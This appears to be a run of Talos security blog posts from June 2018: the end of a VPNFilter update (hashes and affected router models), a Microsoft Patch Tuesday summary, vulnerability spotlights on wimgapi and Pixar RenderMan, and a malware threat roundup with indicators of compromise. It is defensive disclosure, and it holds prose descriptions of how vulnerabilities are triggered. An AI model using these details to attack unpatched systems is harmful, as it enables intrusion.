d1bc07b962ccc6e3596aa238bb7eda13003ea3ca95be27e8244e485165642548
eec5cd045f26a7b5d158e8289838b82e4af7cf4fc4b9048eaf185b5186f760db
29ae3431908c99b0fff70300127f1db635af119ee55cd8854f6d3270b2e3032e
ca0bb6a819506801fa4805d07ee2ebaa5c29e6f5973148fe25ed6d75089c06a7
6d8877b17795bb0c69352da59ce8a6bfd7257da30bd0370eed8428fad54f3128
5cf43c433fa1e253e937224254a63dc7e5ad6c4b3ab7a66ec9db76a268b4deeb
a6e3831b07ab88f45df9ffac0c34c4452c76541c2acd215de8d0109a32968ace
f4f0117d2784a3b8dfef4b5cb7f2583dd4100c32f9ee020f16402508e073f0a1
7093cc81f32c8ce5e138a4af08de6515380f4f23ed470b89e6613bee361159e1
350eaa2310e81220c409f95e6e1e53beadec3cffa3f119f60d0daace35d95437
776cb9a7a9f5afbaffdd4dbd052c6420030b2c7c3058c1455e0a79df0e6f7a1d
d2de662480783072b82dd4d52ab6c57911a1e84806c229f614b26306d5981d98
c8a82876beed822226192ea3fe01e3bd1bb0838ab13b24c3a6926bce6d84411b
f30a0fe494a871bd7d117d41025e8d2e17cd545131e6f27d59b5e65e7ab50d92
8a20dc9538d639623878a3d3d18d88da8b635ea52e5e2d0c2cce4a8c5a703db1
0649fda8888d701eb2f91e6e0a05a2e2be714f564497c44a3813082ef8ff250b
2c2412e43f3fd24d766832f0944368d4632c6aa9f5a9610ab39d23e79756e240
218233cc5ef659df4f5fdabe028ab43bc66451b49a6bfa85a5ed436cfb8dbc32
cccbf9bff47b3fd391274d322076847a3254c95f95266ef06a3ca8be75549a4b
ab789a5a10b4c4cd7a0eb92bbfcf2cc50cb53066838a02cfb56a76417de379c5
4896f0e4bc104f49901c07bc84791c04ad1003d5d265ab7d99fd5f40ec0b327f
5e715754e9da9ed972050513b4566fb922cd87958ecf472d1d14cd76923ae59a
797e31c6c34448fbecda10385e9ccfa7239bb823ac8e33a4a7fd1671a89fe0f6
48bfcbc3162a0b00412cba5eff6c0376e1ae4cfbd6e35c9ea92d2ab961c90342
7a66d65fa69b857beeeaaef67ec835900eee09a350b6f51f51c83919c9223793
b0edf66d4f07e5f58b082f5b8479d48fbab3dbe70eba0d7e8254c8d3a5e852ef
840ba484395e15782f436a7b2e1eec2d4bf5847dfd5d4787ae64f3a5f668ed4f
80c20db74c54554d9936a627939c3c7ea44316e7670e2f7f5231c0db23bc2114
5dabbce674b797aaa42052b501fb42b20be74d9ffcb0995d933fbf786c438178
055bbe33c12a5cdaf50c089a29eaecba2ccf312dfe5e96183b810eb6b95d6c5a
c084c20c94dbbffed76d911629796744eff9f96d24529b0af1e78cda54cdbf02
5f6ee521311e166243d3e65d0253d12d1506750c80cd21f6a195be519b5d697f
fcb6ff6a679ca17d9b36a543b08c42c6d06014d11002c09ba7c38b405b50debe
a168d561665221f992f51829e0b282eeb213b8aca3a9735dbbaecc4d699f66b9
98112bd4710e6ffe389a2beb13ff1162017f62a1255c492f29238626e99509f3
afacb38ea3a3cafe0f8dbd26dee7de3d0b24cdecae280a9b884fbad5ed195de7
b431aebc2783e72be84af351e9536e8110000c53ebb5db25e89021dc1a83625e
2b39634dce9e7bb36e338764ef56fd37be6cd0faa07ee3673c6e842115e3ceb1
11533eedc1143a33c1deae105e1b2b2f295c8445e1879567115adebfdda569e2
36e3d47f33269bef3e6dd4d497e93ece85de77258768e2fa611137fa0de9a043
e6c5437e8a23d50d44ee47ad6e7ce67081e7926a034d2ac4c848f98102ddb2f8
1cb3b3e652275656b3ae824da5fb330cccd8b27892fb29adc96e5f6132b98517
ec88fe46732d9aa6ba53eed99e4d116b7444afd2a52db988ea82f883f6d30268
99944ad90c7b35fb6721e2e249b76b3e8412e7f35f6f95d7fd3a5969eaa99f3d
8505ece4360faf3f454e5b47239f28c48d61c719b521e4e728bc12d951ecf315
dd88273437031498b485c380968f282d09c9bd2373ef569952bc7496ebadadde
6e7bbf25ea4e83229f6fa6b2fa0f880dde1594a7bec2aac02ff7d2d19945d036
f989df3aeede247a29a1f85fc478155b9613d4a416428188eda1a21bd481713a
4af2f66d7704de6ff017253825801c95f76c28f51f49ee70746896df307cbc29
ba9fee47dcc7bad8a7473405aabf587e5c8d396d5dd5f6f8f90f0ff48cc6a9ce
5d94d2b5f856e5a1fc3a3315d3cd03940384103481584b80e9d95e29431f5f7a
33d6414dcf91b9a665d38faf4ae1f63b7aa4589fe04bdd75999a5e429a53364a
14984efdd5343c4d51df7c79fd6a2dfd791aa611a751cc5039eb95ba65a18a54
879be2fa5a50b7239b398d1809e2758c727e584784ba456d8b113fc98b6315a2
c0cfb87a8faed76a41f39a4b0a35ac6847ffc6ae2235af998ee1b575e055fac2
fc9594611445de4a0ba30daf60a7e4dec442b2e5d25685e92a875aca2c0112c9
81cbe57cd80b752386ee707b86f075ad9ab4b3a97f951d118835f0f96b3ae79d
4e022e4e4ee28ae475921c49763ee620b53bf11c2ad5fffe018ad09c3cb078cc
a3cf96b65f624c755b46a68e8f50532571cee74b3c6f7e34eecb514a1eb400cf
ff471a98342bafbab0d341e0db0b3b9569f806d0988a5de0d8560b6729875b3e
638957e2def5a8fda7e3efefff286e1a81280d520d5f8f23e037c5d74c62553c
4ffe074ad2365dfb13c1c9ce14a5e635b19acb34a636bae16faf9449fb4a0687
4c596877fa7bb7ca49fb78036b85f92b581d8f41c5bc1fa38476da9647987416
49a0e5951dbb1685aaa1a6d2acf362cbf735a786334ca131f6f78a4e4c018ed9
0dc1e3f36dc4835db978a3175a462aa96de30df3e5031c5d0d8308cdd60cbede
e74ae353b68a1d0f64b9c8306b2db46dfc760c1d91bfdf05483042d422bff572
00c9bbc56388e3fffc6e53ef846ad269e7e31d631fe6068ff4dc6c09fb40c48b
c2bcde93227eb1c150e555e4590156fe59929d3b8534a0e2c5f3b21ede02afa0
70c271f37dc8c3af22fdcad96d326fe3c71b911a82da31a992c05da1042ac06d
ffb0e244e0dabbaabf7fedd878923b9b30b487b3e60f4a2cf7c0d7509b6963ba
dbede977518143bcee6044ed86b8178c6fc9d454fa346c089523eedee637f3be
4d6cbde39a81f2c62d112118945b5eeb1d73479386c962ed3b03d775e0dccfa0
fa229cd78c343a7811cf8314febbc355bb9baab05b270e58a3e5d47b68a7fc7d
4beba775f0e0b757ff32ee86782bf42e997b11b90d5a30e5d65b45662363ece2
a41da0945ca5b5f56d5a868d64763b3a085b7017e3568e6d49834f11952cb927
f3d0759dfab3fbf8b6511a4d8b5fc087273a63cbb96517f0583c2cce3ff788b8
fa4b286eeaf7d74fe8f3fb36d80746e18d2a7f4c034ae6c3fa4c917646a9e147
be3ddd71a54ec947ba873e3e10f140f807e1ae362fd087d402eff67f6f955467
6449aaf6a8153a9ccbcef2e2738f1e81c0d06227f5cf4823a6d113568f305d2a
39dc1aded01daaf01890db56880f665d6cafab3dea0ac523a48aa6d6e6346fff
01d51b011937433568db646a5fa66e1d25f1321f444319a9fba78fd5efd49445
099a0b821f77cb4a6e6d4a641ed52ee8fea659ee23b657e6dae75bb8ca3418c3
4cbf9ecb6ca4f2efed86ba6ebf49436c65afe7ae523ec9dae58e432a9d9a89d0
66a98ad0256681313053c46375cb5c144c81bf4b206aaa57332eb5f1f7176b8c
97d00fc2bc5f5c9a56b498cf83b7a801e2c11c056772c5308ee7adea50556309
9e854d40f22675a0f1534f7c31626fd3b67d5799f8eea4bd2e2d4be187d9e1c7
a125b3e627ecd04d0dd8295e12405f2590144337481eb21086c4afb337c5b3f2
a7d154eaee39ff856792d86720a8d193da3d73bfe4ac8364da030d80539e9ac2
b2dd77af9dd9e8d7d4ebc778f00ff01c53b860a04c4e0b497f2ae74bb8a280c0

3rd Stage Plugins

f8286e29faa67ec765ae0244862f6b7914fcdde10423f96595cb84ad5cc6b344
afd281639e26a717aead65b1886f98d6d6c258736016023b4e59de30b7348719
acf32f21ec3955d6116973b3f1a85f19f237880a80cdf584e29f08bd12666999
47f521bd6be19f823bfd3a72d851d6f3440a6c4cc3d940190bdc9b6dd53a83d6
d09f88baf33b901cc8a054d86879b81a81c19be45f8e05484376c213f0eedda2
2af043730b632d237964dd6abd24a7f6db9dc83aab583532a1238b4d4188396b
4bfc43761e2ddb65fedab520c6a17cc47c0a06eda33d11664f892fcf08995875
e7f65aeec592b047ac1726ef0d8245229041474a2a71b7386e72ad5db075f582
cd8cf5e6a40c4e87f6ee40b9732b661a228d87d468a458f6de231dd5e8de3429
4fa1854fbec31f87ae306034fd01567841159ca7793eba58b90be5f7fc714d62
bad8a5269e38a2335be0a03857e65ff91620a4d1e5211205d2503ef70017b69c
d1e6ec5761f78899332b170c4ca7158dccd3463dab2e58e51e5b6c0d58c7d84f
ff118edb9312c85b0b7ff4af1fc48eb1d8c7c8da3c0e1205c398d2fe4a795f4b
7f6f7c04826c204e2fc5c1eddb8332afe1669a4856229921c227694899e7ada8
6807497869d9b4101c335b1688782ab545b0f4526c1e7dd5782c9deb52ee3df4
ae74f62881eb224e58f3305bb1da4f5cb7ccff53c24ab05db622807d74e934fb
3df17f01c4850b96b00e90c880fdfabbd11c64a8707d24488485dd12fae8ec85
8f3e1e3f0890ad40d7fa66939561e20c0e5fd2a02b1dea54f3899aff9c015439
1367060db50187eca00ad1eb0f4656d3734d1ccea5d2d62f31f21d4f895e0a69
82cd8467e480bcd2e2fc1efb5257bbe147386f4a7651d1da2bfd0ab05e3d86b9
94eefb8cf1388e431de95cab6402caa788846b523d493cf8c3a1aa025d6b4809
9b039787372c6043cce552675e3964bf01de784d1332ddc33e4419609a6889f1
78fee8982625d125f17cf802d9b597605d02e5ea431e903f7537964883cf5714
e7aee375215e33fc5aebd7811f58a09c37d23e660f3250d3c95aec48ad01271c
3bd34426641b149c40263e94dca5610a9ecfcbce69bfdd145dff1b5008402314

Self-Signed Certificate Fingerprints

d113ce61ab1e4bfcb32fb3c53bd3cdeee81108d02d3886f6e2286e0b6a006747
c52b3901a26df1680acbfb9e6184b321f0b22dd6c4bb107e5e071553d375c851
f372ebe8277b78d50c5600d0e2af3fe29b1e04b5435a7149f04edd165743c16d
be4715b029cbd3f8e2f37bc525005b2cb9cad977117a26fac94339a721e3f2a5
27af4b890db1a611d0054d5d4a7d9a36c9f52dffeb67a053be9ea03a495a9302
110da84f31e7868ad741bcb0d9f7771a0bb39c44785055e6da0ecc393598adc8
fb47ba27dceea486aab7a0f8ec5674332ca1f6af962a1724df89d658d470348f
b25336c2dd388459dec37fa8d0467cf2ac3c81a272176128338a2c1d7c083c78
cd75d3a70e3218688bdd23a0f618add964603736f7c899265b1d8386b9902526
110da84f31e7868ad741bcb0d9f7771a0bb39c44785055e6da0ecc393598adc8
909cf80d3ef4c52abc95d286df8d218462739889b6be4762a1d2fac1adb2ec2b
044bfa11ea91b5559f7502c3a504b19ee3c555e95907a98508825b4aa56294e4
c0f8bde03df3dec6e43b327378777ebc35d9ea8cfe39628f79f20b1c40c1b412
8f1d0cd5dd6585c3d5d478e18a85e7109c8a88489c46987621e01d21fab5095d
d5dec646c957305d91303a1d7931b30e7fb2f38d54a1102e14fd7a4b9f6e0806
c0f8bde03df3dec6e43b327378777ebc35d9ea8cfe39628f79f20b1c40c1b412

Known Affected Devices

The following devices are known to be affected by this threat. Based on the scale of this research, much of our observations are remote and not on the device, so it is difficult to determine specific version numbers and models in many cases.

Given our observations with this threat, we assess that this list may still be incomplete and other devices may be affected.

Asus Devices:

RT-AC66U (new)
RT-N10 (new)
RT-N10E (new)
RT-N10U (new)
RT-N56U (new)
RT-N66U (new)

D-Link Devices:

DES-1210-08P (new)
DIR-300 (new)
DIR-300A (new)
DSR-250N (new)
DSR-500N (new)
DSR-1000 (new)
DSR-1000N (new)

Huawei Devices:

HG8245 (new)

Linksys Devices:

E1200
E2500
E3000 (new)
E3200 (new)
E4200 (new)
RV082 (new)
WRVS4400N

Mikrotik Devices:

CCR1009 (new)
CCR1016
CCR1036
CCR1072
CRS109 (new)
CRS112 (new)
CRS125 (new)
RB411 (new)
RB450 (new)
RB750 (new)
RB911 (new)
RB921 (new)
RB941 (new)
RB951 (new)
RB952 (new)
RB960 (new)
RB962 (new)
RB1100 (new)
RB1200 (new)
RB2011 (new)
RB3011 (new)
RB Groove (new)
RB Omnitik (new)
STX5 (new)

Netgear Devices:

DG834 (new)
DGN1000 (new)
DGN2200
DGN3500 (new)
FVS318N (new)
MBRN3000 (new)
R6400
R7000
R8000
WNR1000
WNR2000
WNR2200 (new)
WNR4000 (new)
WNDR3700 (new)
WNDR4000 (new)
WNDR4300 (new)
WNDR4300-TN (new)
UTM50 (new)

QNAP Devices:

TS251
TS439 Pro
Other QNAP NAS devices running QTS software

TP-Link Devices:

R600VPN
TL-WR741ND (new)
TL-WR841N (new)

Ubiquiti Devices:

NSM2 (new)
PBE M5 (new)

Upvel Devices:

Unknown Models* (new)

ZTE Devices:

ZXHN H108N (new)

* Malware targeting Upvel as a vendor has been discovered, but we are unable to determine which specific device it is targeting.

↧

Microsoft Patch Tuesday - June 2018

June 12, 2018, 11:58 am

≫ Next: Vulnerability Spotlight: TALOS-2018-0545 - Microsoft wimgapi LoadIntegrityInfo Code Execution Vulnerability

≪ Previous: VPNFilter Update - VPNFilter exploits endpoints, targets new devices

Executive Summary

Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 50 flaws, with 11 of them rated "critical," and 39 rated "important." These vulnerabilities impact Microsoft Edge, Internet Explorer, Chakra Scripting Engine, Windows DNSAPI, Microsoft Office, Windows Kernel and more.

In addition to the 50 vulnerabilities referenced above, Microsoft has also released a critical update advisory, ADV180014, the June 2018 Adobe Flash Security Update, which addresses the vulnerabilities described in the security bulletin.

Critical vulnerabilities

This month, Microsoft is addressing 11 vulnerabilities that are rated "critical." Talos believes these three vulnerabilities in particular are notable and require prompt attention.

CVE-2018-8225 - Windows DNSAPI Remote Code Execution Vulnerability

A remote code vulnerability is present within Windows DNS. This vulnerability manifests due to DNSAPI.dll improperly handling DNS responses. This vulnerability could allow a remote attacker to execute arbitrary code within the context of the LocalSystem account on affected systems. An attacker could leverage a malicious DNS server and send specially crafted DNS responses to trigger this vulnerability.

CVE-2018-8229 - Chakra Scripting Engine Memory Corruption Vulnerability

A remote code execution vulnerability is present within Microsoft Scripting Engine. This vulnerability manifests due to the Chakra engine improperly handling objects in memory. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker controlled webpage, or simply a page that hosts external content, such as advertisements.

CVE-2018-8267 - Scripting Engine Memory Corruption Vulnerability

A remote code execution vulnerability is present within Microsoft Scripting Engine. THis vulnerability manifests due to scripting engine not properly handling objects in memory in Internet Explorer. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability was publicly disclosed prior to a patch being made available.

Other vulnerabilities deemed "critical" are listed below:

Important vulnerabilities

This month, Microsoft is addressing 39 vulnerabilities that are rated "important." One of these vulnerabilities is TALOS-2018-0545, which was assigned CVE-2018-8210. This vulnerability is a Windows remote code execution flaw that was discovered by Marcin Noga of Cisco Talos. Additional information related to this vulnerability can be found in the advisory report here.

Additionally, Talos believes the following vulnerability is notable and requires prompt attention.

CVE-2018-8227 - Chakra Scripting Engine Memory Corruption Vulnerability

A remote code execution vulnerability is present within the Microsoft Scripting Engine. This vulnerability manifests due to the Chakra engine improperly handling objects in memory. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker controlled webpage, or simply a page that hosts external content, such as advertisements.

Other vulnerabilities deemed "important" are listed below:

Coverage

In response to these vulnerability disclosures, Talos is releasing the following Snort rules that detects attempts to exploit them. Please note that additional rules may be released in the future, and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rules:

45628, 46927 - 46930, 46933 - 46935, 46938 - 46945, 46951 - 46958, 46961 - 46962

↧

Vulnerability Spotlight: TALOS-2018-0545 - Microsoft wimgapi LoadIntegrityInfo Code Execution Vulnerability

June 13, 2018, 8:14 am

≫ Next: Vulnerability Spotlight: TALOS-2018-0523-24 - Multiple Vulnerabilities in Pixars Renderman application

≪ Previous: Microsoft Patch Tuesday - June 2018

Vulnerabilities discovered by Marcin Noga from Talos

Overview

Talos is disclosing a remote code execution vulnerability in the Microsoft wimgapi library. The wimgapi DLL is used in the Microsoft Windows operating system to perform operations on Windows Imaging Format (WIM) files. WIM is a file-based disk image format created by Microsoft to simplify the deployment of Windows systems. If an attacker creates a specially crafted WIM file, they could be able to execute malicious code with the same access rights as the logged-in user, or just crash the system with a denial-of-service attack. The vulnerability is related to the file header parsing, which means it gets triggered even on simple operations. WIM files do not have a registered file type handler by default, which means that this vulnerability cannot be triggered by tricking a user into double-clicking a WIM file — at least not without registering a file-handler first.

Details

The vulnerability exists in the LoadIntegrityInfo functions that manifest during the parsing of a WIM file header. A specially crafted WIM file can lead to a heap corruption, and remote code execution.
The vulnerability triggers, even on the simplest operations performed on a malformed WIM file. For example, it is enough if an application tries to open the WIM file via the WIMCreateFile function and requests a file handle. The function allocates heap memory based on a user-controlled size value, and uses another user-controlled value to read n bytes from the file into this buffer. It is using these values without any prior input checks.

More technical details can be found in the Talos Vulnerability Reports.

Coverage

↧

Vulnerability Spotlight: TALOS-2018-0523-24 - Multiple Vulnerabilities in Pixars Renderman application

June 14, 2018, 7:54 am

≫ Next: Threat Roundup for June 1-15

≪ Previous: Vulnerability Spotlight: TALOS-2018-0545 - Microsoft wimgapi LoadIntegrityInfo Code Execution Vulnerability

Vulnerabilities discovered by Tyler Bohan from Talos

Overview

Talos is disclosing two denial-of-ervice vulnerabilities in Pixar’s Renderman application. Renderman is a rendering application used in animation and film production. It is widely used for advanced rendering and shading in many large-scale environments. Both vulnerabilities are due to the lack of proper validation during the parsing process of network packets.

Pixar remedied these vulnerabilities in RenderMan version 21.7

Details

TALOS-2018-0523 / CVE-2018-3840

An attacker could send a malformed TCP packet to port 4001 using the ‘0x67’ command that is not followed by one of the four values (0x00 - 0x03) permitted for the subsequent byte. Due to a lack of input validation, a null pointer dereference is caused, as well as a denial of service. You can read more details in the Talos Vulnerability Report.

TALOS-2018-0524 / CVE-2018-3841

This vulnerability is caused by a very similar issue as described in TALOS-2018-0523. The only difference is that a potential attacker supplies a packet containing the ‘0x69’ command, followed by more than one byte of data to trigger the vulnerability. You can read more details in the Talos Vulnerability Report.

Coverage

↧

Threat Roundup for June 1-15

June 15, 2018, 12:08 pm

≫ Next: Vulnerability Spotlight: Multiple Remote Vulnerabilities In Insteon Hub PubNub

≪ Previous: Vulnerability Spotlight: TALOS-2018-0523-24 - Multiple Vulnerabilities in Pixars Renderman application

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 01 and June 15. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

Win.Dropper.Johnnie-6567758-0
Dropper
Johnnie, also known as Mikey, is a malware family that focuses on persistence, and is known for its plugin architecture.
Win.Dropper.Yakes-6563213-0
Dropper
This malware family sets up persistence on target systems by adding a registry entry to HKLM\Software\Microsoft\CurrentUser\Run. It also uses netsh.exe to modify Windows Firewall rules to allow a DLL to communicate externally.
Win.Dropper.Prepscram-6571863-0
Dropper
Prepscram is a software bundler that may install other unwanted software.
Win.Dropper.Scar-6563211-0
Dropper
Scar is a remote access trojan that will attempt to steal users' login credentials on multiple financial websites.
Win.Dropper.Gandcrab-6574655-0
Dropper
Gandcrab is ransomware that targets Windows machines and requests payments using "Dash" in order to recover encrypted files. It is under almost constant development, with its creators releasing new versions at an aggressive pace.

Threats

Win.Dropper.Johnnie-6567758-0

Indicators of Compromise

Registry Keys

<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\4F8A903B98DDC9436D66B555E49D04A498A2C0E6

Value: Blob

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WTBHOV\INSTANCES\WTBHOV INSTANCE

Value: Altitude

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WTBHOV\INSTANCES\WTBHOV INSTANCE

Value: Flags

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WTBHOV

Value: ImagePath

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WTBHOV

Value: DisplayName

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WTBHOV

Value: St

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WTBHOV

Value: Start

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WTBHOV

Value: ErrorControl

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WTBHOV

Value: WOW64

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WTBHOV

Value: Group

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WTBHOV

Value: Type

<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES

Value: 4F8A903B98DDC9436D66B555E49D04A498A2C0E6

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WTBHOV\INSTANCES

Value: DefaultInstance

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP6\PARAMETERS

Value: DisabledComponents

<HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK

Value: atimode

<HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK

Value: shield_count

<HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK

Value: set_pt

<HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK

Value: set_bl

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\COMPATIBILITY ASSISTANT\PERSISTED

Value: C:\Users\ADMINI~1\AppData\Local\Temp\n1s\nchsetup.exe

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS

Value: DisableTaskOffload

<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\NETWORK\FILESERVICE

Value: igfxmtc_time

<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\NETWORK\FILESERVICE

Value: Liveup

<HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION

Value: PnpInstanceID

<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\4F8A903B98DDC9436D66B555E49D04A498A2C0E6
<HKLM>\Software\Microsoft\WBEM\CIMOM
<HKCU>\Software\Classes\Local Settings\MuiCache
<HKCU>\Software\Classes\Local Settings\MuiCache\3e\52C64B7E
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WTBHOV\INSTANCES\wtbhov Instance
<HKLM>\SOFTWARE\WOW6432NODE\NCH SOFTWARE\ExpressAnimate
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\wtbhov
<HKLM>\SOFTWARE\WOW6432NODE\NCH Software
<HKLM>\SOFTWARE\Wow6432Node
<HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\Root
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WTBHOV\Instances
<HKLM>\Software\Wow6432Node\NCH Software\ExpressAnimate
<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted
<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Network\FileService
<HKLM>\SOFTWARE\CLASSES
<HKLM>\Software\Microsoft\SystemCertificates\Root

Mutexes

IP Addresses

45[.]77[.]68[.]17
45[.]32[.]78[.]78
45[.]63[.]57[.]87
173[.]192[.]16[.]184
174[.]37[.]56[.]249

Domain Names

gpt9[.]com
optcdn[.]com
www[.]userbest[.]com
optitm[.]com

Files and or directories created

%WinDir%\TEMP\UDD25E0.tmp
%LocalAppData%\Temp\F08B.tmp
%LocalAppData%\igfxmtc\igfxmtc.exe
%LocalAppData%\Temp\EF04.tmp
%LocalAppData%\Temp\EDDB.tmp.exe
%LocalAppData%\Temp\F251.tmp
%LocalAppData%\igfxmtc
%LocalAppData%\Temp\n1s\nchdata.cab
%WinDir%\TEMP\UDD1615.tmp
%LocalAppData%\Temp\n1s\nchsetup.cab
%LocalAppData%\avknwbh\dowmload.tmp
%WinDir%\TEMP\UDD359B.tmp
%LocalAppData%\Temp\n1s\nchsetup.exe
%WinDir%\TEMP\UDD1E02.tmp
%WinDir%\TEMP\msidntfs\SSL\cert.db
%WinDir%\TEMP\UDD2DBD.tmp
%LocalAppData%\Temp\EDDB.tmp
%AppData%\NCH Software\ExpressAnimate\Logs
%WinDir%\TEMP\UDDF579.tmp
%System32%\vsakdwi\cweubpd.exe
%System32%\drivers\auswkvge.sys
%System32%\vsakdwi\cweubpddrv.sys
%LocalAppData%\Temp\F0AB.tmp
%AppData%\NCH Software\ExpressAnimate
%WinDir%\TEMP\msidntfs\SSL\SecureTrust Network Root CA 2.cer
%LocalAppData%\Temp\n1s
%WinDir%\SysWOW64\vsakdwi
%System32%\vsakdwi\cweubpd.sys
%System32%\vsakdwi
%LocalAppData%\avknwbh
%WinDir%\TEMP\UDDE28.tmp
%WinDir%\TEMP\msidntfs
%WinDir%\TEMP\msidntfs\SSL
%AppData%\NCH Software
%LocalAppData%\Temp\n1s\nchdata.dat
%LocalAppData%\Temp\EE1B.tmp
%LocalAppData%\igfxmtc\dowmload.tmp

File Hashes

9eedaac111db1f28fc90300e2ecf417368595ebca2763a211fe1bb356527f06e
8de212ff8c8364cfce48bf818b245eaf46db049e2fb4f48b4ef839d6160ed245
023789cfc258b2d9bae00e94de0f1ee96f33f20a98415421d63f64be90e4b236
5308ee082f975bd750aefa0c1cad84a517a48a7dcc1e72ad665e2a6ae1a6e73c
6ee5b5dcc0bbf0ea59be2a87d413f31c7775b44fa50787c6fef594f34666e757
6964abdc0a2daed0a51ca023392ac96b809584a8f1e9014f159e670e2b4b12af
9e9b6c508e2d483b6ca8461a9629e9f0f7b452c7463248bc8879b880a5cb40cf
cb9be6bbc4bf545cdbfb87585289197202bcd5cfb31aa88813bad0277756a175
a14c508538dba4e05fcac66ddcfc1aaf4454507907523ba7d0983380e0a153da
3f78f88330bfd6eaa889ffc2332b91235a4fb8bb364d0b076b6ebfb51f8f02ef
87ee726e7e84443d44cfcaaf2151938d7cbb04b2dbb60669c6a843ecf51588e6
c10e952f5ad87ee0685409c2f6855009e069b181ad7e155f118f524e09de621a
d89080318573953ea0e0c2654a14252c70daa368ed3c81f6fd1aaeb2b2bcdeeb
2ecf1771778fce31ff2c6004c3601be6d372189166fec6511a0f393fb684bff0
36b5297734e9ca147c71985b649d0f49fcc0324d2b61cefda1135fd9a5ffa0d2
25c14e5ea990fee7091433ea8050caecb60be93c81d54100506ed23bb472bb8e
62e97b12781c36ac029176ce7b10cbfcf6fd58ff4552025aa1d8fc60bcde4bee
d7e0958d2eaa5f17e0ffc2ee6a4549401c30b381499df3a52384ef04023e0c80
26e6871828aba6f30916bbcc6d8d60d9320f11d791993fe7fec1c7ecfa1cd733
1ff912cfaf566f4e5a76a8a53f5e423a78df1dc9e187c5485b894665f847e563
0e73d31d6db3dd82988313fe3f463891b24d0e41286d93a89df6a8a56aeccc8c
2c874006199614655a153045793254888ceb0d0aa68c0d40b56351f54b0fab68
6491f8c7234d1a92befb8eb01c8c7ff981b3a51cd5a4eb187e82911a01ae3327
5fbe25ba6c8e8a52932053adaa22028ac2ddc3f14b187884bd40f8a0f3d02cf8
50dcb2e7e9f7443099dc66ea5f0c1c73f25af3425c7365fc8f58ec43b0f28d71

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Dropper.Yakes-6563213-0

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: strght

<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\UI
<HKLM>\System\CurrentControlSet\Services\NapAgent\Shas
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\Enroll\HcsGroups
<HKLM>\System\CurrentControlSet\Services\NapAgent\Qecs
<HKLM>\System\CurrentControlSet\Services\NapAgent\LocalConfig

Mutexes

IP Addresses

Domain Names

Files and or directories created

File Hashes

169fe9e796839d98dd0f00264bad976ac2b5c0771d66a66514854c65656f2e54
ecac7c8ec814eb19822ce5e93696d766cc991b827c918088866f44bfcebdd710
c9edd7a71859740afbc817868f500cc2ed319d8f0127b7d4ecf89e83cc307482
c21a3833cad6f3c196ee70d0343939221106b219dde1481fea5ae7a48b32c4a0
53721e54bf9a6e35ec1558c4d3237db12db995f3d89a2cb05e06dcb3b82cb14c
fc6fc2eb348727f9dd1a66a69811bc2b1441d46f2eca1eb1d34aa27dc42aca94
c2545d675a7d05c41111e7f6196daf51470612f6db65b320e0aea556027d89b7
a4a3bec19ffc852d04f8b11edd6713338076802e1335d5939e21231b30d66b31
90d861b3500e776c25e31c1a4f6af656415f6071944ba65efa039e642330403e
